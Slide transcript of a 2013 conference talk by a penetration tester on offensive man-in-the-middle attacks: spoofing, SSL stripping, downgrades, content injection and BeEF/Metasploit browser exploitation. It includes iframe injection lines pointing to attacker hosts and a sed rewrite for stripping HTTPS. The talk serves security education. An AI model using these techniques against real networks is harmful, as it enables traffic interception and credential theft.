offensive mitm
TRANSCRIPT
Offensive Man-in-the-MiddleNavaja Negra - AlbaceteOctubre 2013
Jose Selvi
10 years working in Security
Senior Penetration Tester at
SANS Institute Community Instructor
GIAC Security Expert (GSE)
Twitter: @JoseSelvi
Blog: http://www.pentester.es
$ whois jselvi
Disclaimer!
No user was (very) harmed in the making of this speach
Let’s Go!Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
Man-in-the-Middle
Man-in-the-Middle
ARP Spoofing
I’M THE ROUTER!
WHO’S THE ROUTER?
DHCP Spoofing
YOUR IP IS...
I WANT AN IP
ICMP Redirect
A NEW ROUTEFOR YOU
Much more...DNS Spoofing
Port Stealing
STP Mangling
Route Mangling
...
Even Social Engineering...
Let’s Go!Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
Just Sniffing...
Automated Analysis
Password Capture
Let’s Go!Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
Protocol Negotiation|@#|@#|@#|@#|#@
|@#|@#|@#|@# |@#|@#|#|#@|@#|@#|@#
Downgrade Attack
Y dice “a relaxing cup of cafe con leche” la tia... Calla, calla... que yo les
he dejado dinero...
Attacker
The SSHv1 Example
Client
OK, Let’s talk SSHv1
Server
I can speakv1 & v2
SSHv1
I can speakjust v1
Let’s Go!Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
Self-Signed Certificate
AttackerClient ServerHTTPS
HTTPS
SSL Striphttp://www.thoughtcrime.org/software/sslstrip/
By Moxie Marlinspike
Transparent proxy
HTTP to HTTPS Gateway
sed ‘s/https/http/g’
Usually all starts with an HTTP connection
SSL Strip
Attacker
Client Server
HTTP
HTTPS<body><img src=whatever.jpg><a href =</body>
https://myweb/login>
GET / HTTP/1.1
http://myweb/login>
DEMO
SSL VulnerabilitiesBEAST / CRIME
By Juliano Rizzo, Thai Duong
BREACH
By Angel Prado, Neal Harris, Yoel Gluck
Based on compression characteristics before encryption.
Chosen plaintext attack
It can decrypt secrets (cookie, csrf-token, etc).
Let’s Go!Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
Spanish model
Corp.C
Corp.A
Corp.B
Corp.D
The “K” Factor<body><img src=whatever.jpg>
</body><iframe src=http://hacker/>
<body><img src=whatever.jpg>
</body><iframe src=http://hacker/>
The Middlerhttps://code.google.com/p/middler/
By InGuardians
Transparent HTTP & SIP Proxy
Plugin based: Easy & Powerful
IFrame Injection
Last release from July 2009
Some fixes are needed...
but... that is why Python r00l3z :)
The Middler Plugins
Burp Suite / The Middler
Attacker
Client Server
HTTP
HTTP<body><img src=whatever.jpg>
</body><iframe src=http://hacker/>
GET / HTTP/1.1
Burp Suitehttp://portswigger.net/burp/
By PortSwigger
General interception proxy
Support transparent proxy
Support match/replace function
Best option if you have the Pro version
If not... you will lose your configuration when closing
Burp Suite
DEMO
Let’s Go!Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
BeEF & Metasploit
BeEF: Browser Exploitation Framework
http://beefproject.com/
Metasploit Framework
http://www.metasploit.com/
BeEF & MSF
GOOGLE BeEFMSF
VICTIM
<iframe src=http://attacker/demo
What to doFingerprinting
Redirect to another page
Capture NTLM
SMB Relay Attacks
Credential Theft
Request software installation
DEMO
Let’s Go!Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
Browser Vulnerabilities 2012Internet Explorer: 34
Mozilla Firefox: 99
Google Chrome: 68
Java Plugin: 32
Adobe Flash: 61
Adobe Reader: 25http://www.gfi.com/blog/wp-content/uploads/2013/02/Most-Targeted-Applications-in-2012.jpg
Metasploit Exploitation
GOOGLE MSF
VICTIM
<iframe src=http://attacker/demo
DEMO
Let’s Go!Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
Jose Selvihttp://twitter.com/JoseSelvi
[email protected]://www.pentester.es
[email protected]://www.s21sec.com
Thanks! Questions?